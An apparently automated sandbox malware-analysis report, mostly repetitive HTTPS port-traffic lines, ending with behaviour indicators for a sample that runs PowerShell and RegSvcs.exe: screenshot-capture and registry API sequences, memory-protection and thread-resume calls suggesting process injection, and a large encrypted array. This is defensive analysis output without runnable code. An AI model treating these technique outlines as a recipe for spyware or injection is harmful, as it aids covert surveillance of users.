Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50400
Source: unknown	Network traffic detected: HTTP traffic on port 50396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 50324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50293 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50336 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50281 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50397 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50381 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50337
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50336
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50218
Source: unknown	Network traffic detected: HTTP traffic on port 50254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50339
Source: unknown	Network traffic detected: HTTP traffic on port 50386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50338
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50219
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50333
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50334
Source: unknown	Network traffic detected: HTTP traffic on port 50328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50223
Source: unknown	Network traffic detected: HTTP traffic on port 50339 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50222
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50224
Source: unknown	Network traffic detected: HTTP traffic on port 50289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50358
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50357
Source: unknown	Network traffic detected: HTTP traffic on port 50374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50235
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50356
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50360
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50385 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50364
Source: unknown	Network traffic detected: HTTP traffic on port 50393 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50365
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50367
Source: unknown	Network traffic detected: HTTP traffic on port 50266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50250
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50371
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50370
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50338 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown	Network traffic detected: HTTP traffic on port 50278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50300
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50301
Source: unknown	Network traffic detected: HTTP traffic on port 50373 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50329
Source: unknown	Network traffic detected: HTTP traffic on port 50316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50323
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50295
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50299
Source: unknown	Network traffic detected: HTTP traffic on port 50319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 50286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50183
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50389 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50388 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 50354 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 50365 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50259
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50373
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50372
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50374
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 50376 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50377
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50376
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50378
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50380
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50382
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50381
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 50387 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50262
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50383
Source: unknown	Network traffic detected: HTTP traffic on port 50391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50385
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50388
Source: unknown	Network traffic detected: HTTP traffic on port 50226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50387
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50389
Source: unknown	Network traffic detected: HTTP traffic on port 50264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50391
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50390
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50393
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50271
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50392
Source: unknown	Network traffic detected: HTTP traffic on port 50329 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50395
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50397
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50399
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50398
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50159
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50281
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50280
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50283
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50282
Source: unknown	Network traffic detected: HTTP traffic on port 50307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50285
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50284
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50287
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50286
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50291
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50294
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 50287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50293
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50398 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50368 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50399 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50367 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50378 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50333 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50273 -> 443

Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:50116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50156 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.8:50157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50164 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004061F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

3_2_004061F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

System Summary

.NET source code contains very large array initializations

Source: 8.2.powershell.exe.5b8a088.3.raw.unpack, SelectorTester.cs

Large array initialization: EncryptSelector: array initializer size 304896

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06D12D80 NtResumeThread,	11_2_06D12D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06D11B88 NtProtectVirtualMemory,	11_2_06D11B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06D11B87 NtProtectVirtualMemory,	11_2_06D11B87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06D12D79 NtResumeThread,	11_2_06D12D79
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 36_2_000002163BAA89F7 NtQuerySystemInformation,	36_2_000002163BAA89F7
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 36_2_000002163BAA21F2 NtQuerySystemInformation,	36_2_000002163BAA21F2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB4B123C38	0_2_00007FFB4B123C38
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB4B1F3011	0_2_00007FFB4B1F3011
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004061F0	3_2_004061F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040B700	3_2_0040B700
